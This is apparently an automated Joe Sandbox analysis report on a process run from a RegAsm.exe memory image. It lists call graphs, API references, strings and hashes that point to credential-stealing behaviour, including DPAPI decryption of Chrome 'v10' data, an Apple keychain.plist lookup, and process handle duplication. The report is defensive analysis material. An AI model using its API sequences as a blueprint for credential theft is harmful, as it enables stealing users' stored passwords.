37756->37780 37781 4226e0 12 API calls 37756->37781 37758 42014c 37757->37758 37761 420151 37757->37761 37800 41e466 96 API calls 37758->37800 37760 420162 37760->37739 37761->37760 37762 4201b3 37761->37762 37763 420229 37761->37763 37764 4201b8 37762->37764 37765 4201dc 37762->37765 37763->37760 37766 41fd5e 85 API calls 37763->37766 37791 41fbdb 37764->37791 37765->37760 37770 4201ff 37765->37770 37797 41fc4c 37765->37797 37766->37760 37770->37760 37772 42013a 96 API calls 37770->37772 37772->37760 37773->37739 37774->37739 37775->37739 37776->37739 37777->37732 37778->37739 37779->37739 37780->37756 37781->37756 37782->37732 37783->37728 37784->37734 37785->37739 37786->37746 37787->37743 37788->37743 37789->37722 37790->37732 37792 41fbf8 37791->37792 37795 41fbf1 37791->37795 37805 41ee26 37792->37805 37796 41fc39 37795->37796 37815 4446ce 11 API calls 37795->37815 37796->37760 37801 41fd5e 37796->37801 37798 41ee6b 85 API calls 37797->37798 37799 41fc5d 37798->37799 37799->37765 37800->37761 37803 41fd65 37801->37803 37802 41fdab 37802->37760 37803->37802 37804 41fbdb 85 API calls 37803->37804 37804->37803 37806 41ee41 37805->37806 37807 41ee32 37805->37807 37816 41edad 37806->37816 37819 4446ce 11 API calls 37807->37819 37810 41ee3c 37810->37795 37813 41ee58 37813->37810 37821 41ee6b 37813->37821 37815->37796 37825 41be52 37816->37825 37819->37810 37820 41eb85 11 API calls 37820->37813 37822 41ee70 37821->37822 37823 41ee78 37821->37823 37878 41bf99 85 API calls 37822->37878 37823->37810 37826 41be6f 37825->37826 37827 41be5f 37825->37827 37832 41be8c 37826->37832 37857 418c63 memset memset 37826->37857 37856 4446ce 11 API calls 37827->37856 37829 41be69 37829->37810 37829->37820 37832->37829 37833 41bf3a 37832->37833 37834 41bed1 37832->37834 37837 41bee7 37832->37837 37860 4446ce 11 API calls 37833->37860 37836 41bef0 37834->37836 37839 41bee2 37834->37839 37836->37837 37838 41bf01 37836->37838 37837->37829 37861 41a453 85 API calls 37837->37861 37840 41bf24 memset 37838->37840 37842 41bf14 37838->37842 37858 418a6d memset memcpy memset 37838->37858 37846 41ac13 37839->37846 37840->37829 37859 41a223 memset memcpy memset 37842->37859 37845 41bf20 37845->37840 37847 41ac52 37846->37847 37848 41ac3f memset 37846->37848 37851 41ac6a 37847->37851 37862 41dc14 19 API calls 37847->37862 37849 41acd9 37848->37849 37849->37837 37853 41aca1 37851->37853 37863 41519d 37851->37863 37853->37849 37854 41acc0 memset 37853->37854 37855 41accd memcpy 37853->37855 37854->37849 37855->37849 37856->37829 37857->37832 37858->37842 37859->37845 37860->37837 37862->37851 37866 4175ed 37863->37866 37874 417570 SetFilePointer 37866->37874 37869 41760a ReadFile 37871 417637 37869->37871 37872 417627 GetLastError 37869->37872 37870 4151b3 37870->37853 37871->37870 37873 41763e memset 37871->37873 37872->37870 37873->37870 37875 4175b2 37874->37875 37876 41759c GetLastError 37874->37876 37875->37869 37875->37870 37876->37875 37877 4175a8 GetLastError 37876->37877 37877->37875 37878->37823 37879 417bc5 37881 417c61 37879->37881 37884 417bda 37879->37884 37880 417bf6 UnmapViewOfFile CloseHandle 37880->37880 37880->37884 37883 417c2c 37883->37884 37891 41851e 18 API calls 37883->37891 37884->37880 37884->37881 37884->37883 37886 4175b7 37884->37886 37887 4175d6 CloseHandle 37886->37887 37888 4175c8 37887->37888 37889 4175df 37887->37889 37888->37889 37890 4175ce Sleep 37888->37890 37889->37884 37890->37887 37891->37883 39845 4147f3 39848 414561 39845->39848 39847 414813 39849 41456d 39848->39849 39850 41457f GetPrivateProfileIntW 39848->39850 39853 4143f1 memset _itow WritePrivateProfileStringW 39849->39853 39850->39847 39852 41457a 39852->39847 39853->39852

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 0040DDAD
                                                                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                          • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                        • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                        • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                        • memset.MSVCRT ref: 0040DF5F
                                                                                                                                        • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                        • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                        • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                        • API String ID: 2018390131-3398334509
                                                                                                                                        • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                        • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                        • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                        • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                          • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                          • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                        • free.MSVCRT ref: 00418803
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1355100292-0
                                                                                                                                        • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                        • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                        • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                        • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                        APIs
                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1945712969-0
                                                                                                                                        • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                        • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                        • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                        • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$FirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1690352074-0
                                                                                                                                        • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                        • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                        • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                        • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 0041898C
                                                                                                                                        • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSystemmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3558857096-0
                                                                                                                                        • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                        • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                        • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                        • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 004455C2
                                                                                                                                        • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                        • memset.MSVCRT ref: 0044570D
                                                                                                                                        • memset.MSVCRT ref: 00445725
                                                                                                                                          • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                          • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                          • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                          • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                          • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                          • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                        • memset.MSVCRT ref: 0044573D
                                                                                                                                        • memset.MSVCRT ref: 00445755
                                                                                                                                        • memset.MSVCRT ref: 004458CB
                                                                                                                                        • memset.MSVCRT ref: 004458E3
                                                                                                                                        • memset.MSVCRT ref: 0044596E
                                                                                                                                        • memset.MSVCRT ref: 00445A10
                                                                                                                                        • memset.MSVCRT ref: 00445A28
                                                                                                                                        • memset.MSVCRT ref: 00445AC6
                                                                                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                          • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                          • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                          • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                          • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                          • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                        • memset.MSVCRT ref: 00445B52
                                                                                                                                        • memset.MSVCRT ref: 00445B6A
                                                                                                                                        • memset.MSVCRT ref: 00445C9B
                                                                                                                                        • memset.MSVCRT ref: 00445CB3
                                                                                                                                        • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                        • memset.MSVCRT ref: 00445B82
                                                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                        • memset.MSVCRT ref: 00445986
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                        • API String ID: 2334598624-3798722523
                                                                                                                                        • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                        • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                        • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                        • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                          • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                          • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                        • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                        • String ID: $/deleteregkey$/savelangfile
                                                                                                                                        • API String ID: 1442760552-28296030
                                                                                                                                        • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                        • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                        • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                        • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 0040B71C
                                                                                                                                          • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                          • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                        • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                        • memset.MSVCRT ref: 0040B756
                                                                                                                                        • memset.MSVCRT ref: 0040B7F5
                                                                                                                                        • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                        • memset.MSVCRT ref: 0040B851
                                                                                                                                        • memset.MSVCRT ref: 0040B8CA
                                                                                                                                        • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                        • memset.MSVCRT ref: 0040BB53
                                                                                                                                        • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                        • String ID: chp$v10
                                                                                                                                        • API String ID: 229402216-2783969131
                                                                                                                                        • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                        • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                        • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                        • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                        • memset.MSVCRT ref: 00413D7F
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                        • memset.MSVCRT ref: 00413E07
                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                        • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
